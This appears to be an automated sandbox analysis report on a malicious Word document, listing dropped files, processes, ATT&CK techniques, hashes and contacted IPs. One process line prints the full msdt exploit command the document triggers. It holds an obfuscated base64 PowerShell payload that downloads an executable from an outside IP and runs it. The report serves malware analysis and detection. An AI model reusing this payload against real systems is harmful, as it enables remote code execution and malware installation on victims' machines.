      Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll
      Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll
      Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll
      Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll
      Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\ProgramData\Glomet.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll
      Source: C:\ProgramData\Glomet.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll
      Source: C:\ProgramData\Glomet.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll
      Source: C:\ProgramData\Glomet.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll
      Source: C:\ProgramData\Glomet.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll
      Source: C:\Windows\SysWOW64\msdt.exe | Window / User API: threadDelayed 1567
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,29_2_00405A19
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_004065CE FindFirstFileA,FindClose,29_2_004065CE
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_004027AA FindFirstFileA,29_2_004027AA
      Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000
      Source: C:\ProgramData\Glomet.exe | API call chain: ExitProcess graph end node (graph_29-3243)
      Source: C:\ProgramData\Glomet.exe | API call chain: ExitProcess graph end node (graph_29-3394)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
      Source: C:\ProgramData\Glomet.exe | Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
      Source: C:\Windows\SysWOW64\msdt.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,29_2_004033B3
      • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
      • Execution: 11 Command and Scripting Interpreter; 12 Exploitation for Client Execution; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
      • Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
      • Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 11 Process Injection; 1 DLL Side-Loading; 1 Extra Window Memory Injection; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
      • Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 Extra Window Memory Injection
      • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
      • Discovery: 1 Query Registry; 1 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 3 File and Directory Discovery; 15 System Information Discovery; Network Sniffing; Network Service Scanning; System Network Connections Discovery
      • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
      • Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
      • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
      • Command and Control: 1 Encrypted Channel; 14 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 23 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
      • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
      • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      • Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
      [Behavior graph: ID 665041; Sample: 20220714 DWG.doc; Start date: 15/07/2022; Architecture: WINDOWS; Score: 72]

      Source | Detection | Scanner | Label
      20220714 DWG.doc | 8% | Virustotal
      20220714 DWG.doc | 5% | ReversingLabs

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll | 0% | ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll | 0% | Metadefender
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll | 0% | Metadefender
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll | 0% | ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll | 0% | Metadefender
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll | 0% | ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll | 0% | Metadefender
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll | 0% | ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe | 3% | Metadefender
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe | 0% | ReversingLabs

      Source | Detection | Scanner | Label
      29.2.Glomet.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
      29.0.Glomet.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491

      No Antivirus matches

      Source | Detection | Scanner | Label
      No contacted domains info
      Name | Malicious | Antivirus Detection | Reputation
      http://45.141.237.18/icons/ubuntu-logo.png | false | Avira URL Cloud: safe | unknown
      http://45.141.237.18/Glomet.html | false | Avira URL Cloud: safe | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                high
                                                                                                                https://management.azure.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                    high
                                                                                                                    https://wus2.contentsync.FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://incidents.diagnostics.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                      high
                                                                                                                      https://clients.config.office.net/user/v1.0/iosFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                          high
                                                                                                                          https://o365auditrealtimeingestion.manage.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.office.netFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                high
                                                                                                                                https://incidents.diagnosticssdf.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://entitlement.diagnostics.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://substrate.office.com/search/api/v2/initFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://outlook.office.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://storage.live.com/clientlogs/uploadlocationFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://outlook.office365.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://webshell.suite.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://creativecommons.org/ns#Distributionbattery-level-90-charging-symbolic.svg.29.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://launchpad.net/bugs/1288690678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://management.azure.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.141.237.18 | unknown | Netherlands | 62068 | SPECTRAIPSpectraIPBVNL | false
                                                                                                                                                            IP
                                                                                                                                                            192.168.2.1
                                                                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                            Analysis ID:665041
Start date and time: 2022-07-15 15:25:11 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 8m 25s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:20220714 DWG.doc
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:36
                                                                                                                                                            Number of new started drivers analysed:1
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal72.expl.winDOC@20/52@0/2
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 100% (good quality ratio 96.5%)
                                                                                                                                                            • Quality average: 84.5%
                                                                                                                                                            • Quality standard deviation: 24.6%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 44
                                                                                                                                                            • Number of non-executed functions: 24
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .doc
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.76.34, 52.109.12.24, 52.109.88.37, 52.109.76.35, 52.152.110.14, 20.54.89.106, 20.223.24.244, 40.125.122.176
                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:27:15 | API Interceptor | 20x Sleep call for process: splwow64.exe modified
15:28:30 | API Interceptor | 1x Sleep call for process: Glomet.exe modified
Match | Associated Sample Name / URL | Detection
45.141.237.18 | 20220714 DWG.doc | malicious
No context
Match: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll
Associated Sample Name / URL (Detection):
• E-dekont.exe (malicious)
• Requirements.exe (malicious)
• Ziraat Bankasi Swift Mesaji.exe (malicious)
• Ziraat Bankasi Swift Mesaji.exe (malicious)
• SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.26675.exe (malicious)
• SecuriteInfo.com.Variant.Tedy.166527.30135.exe (malicious)
• SecuriteInfo.com.ArtemisF2FD6E65491E.4347.exe (malicious)
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                            Entropy (8bit):0.4761098519323635
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:jGfXAIeJCOU8SF7fZ0jGBdph7FgW3wtZ1IN+hVZO4Fg:afXHOCdHrZ/VT3/uI
                                                                                                                                                                            MD5:B187BF45B74E001B745E6960A8DF9FD1
                                                                                                                                                                            SHA1:B4F844BFFFEEA143A94E1F4FB20CA58D5FDC3298
                                                                                                                                                                            SHA-256:65172B26A326C3B2402A3A9DF1C441EBC80D15283F8CB81D70111F2B470E53ED
                                                                                                                                                                            SHA-512:EBE2C79F543FEBA142270232F1408235724D4E7EF1D9CFCAED9B8C953668F4D6E92DE72AFDC5448DA3E7DF4315DCAFECC75DF05C9B2C389D9D64AB9E7116651B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.4172860556164644
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:EvaV:Evu
                                                                                                                                                                            MD5:E7C929668B21759DDDF8C60D82A00E1F
                                                                                                                                                                            SHA1:ED7AB62092D3871207D763C183D023226C6ACC20
                                                                                                                                                                            SHA-256:7B5138F519F103E0F3E0EACE4B35C8215A34402CC9D6387B1AEE0D75FC7415FB
                                                                                                                                                                            SHA-512:C8CB18E27CF613E1B50DEF87F647FFC2EB5ACA32CB97D01661167D9926461C779B887B1DA2DFC1D08A94A0FDC29406B9C16AF5C456498582FFE42B81C0551149
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:445817. Admin.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):149155
                                                                                                                                                                            Entropy (8bit):5.356500351027788
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:acQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx5ETLKz6e:lJQ9DQC+zPXwI
                                                                                                                                                                            MD5:DB5B9DDF239C38EB448E5019F23C8DDD
                                                                                                                                                                            SHA1:72D82BBDDED65ABDF4349A634EA34DB93BF84985
                                                                                                                                                                            SHA-256:A446051C75A1FB66A0B7E7F04D3CD15EDFCF0F9210F1F4E9616723AB7657D3D9
                                                                                                                                                                            SHA-512:BC038931FDAA019DD902FB3596867D7590E15F5BB039C0C93122588FE5F8858DBF1A8594645EA16FC84DEFB2C2B37488480383646A5C630169A42140773F259B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-07-15T13:26:34">.. Build: 16.0.15510.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13687
                                                                                                                                                                            Entropy (8bit):4.949442412867092
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:mRbRj5lc7cd8d7u55ljNjmOqQPglwy8LIspaMnyuYH3iYmG/N:mXqZc5rHxPgKy8eXmG/N
                                                                                                                                                                            MD5:12BEF5B54D8D40957BDB611DA449C882
                                                                                                                                                                            SHA1:B9F4EA9C1B97F44386485469483A0F603151BAD7
                                                                                                                                                                            SHA-256:05CB7A919383D449B6D9A16A0C44689FCB557982B5DF33C8C28A676F1AD88F06
                                                                                                                                                                            SHA-512:15570BADD82DEF69C039E6740CE8C8D40B497FA43AFA3DBC8B90859E6526DA148CA0F131AF6C2E166757DB5712805C787006209A76387451343586E265604899
                                                                                                                                                                            Malicious:false
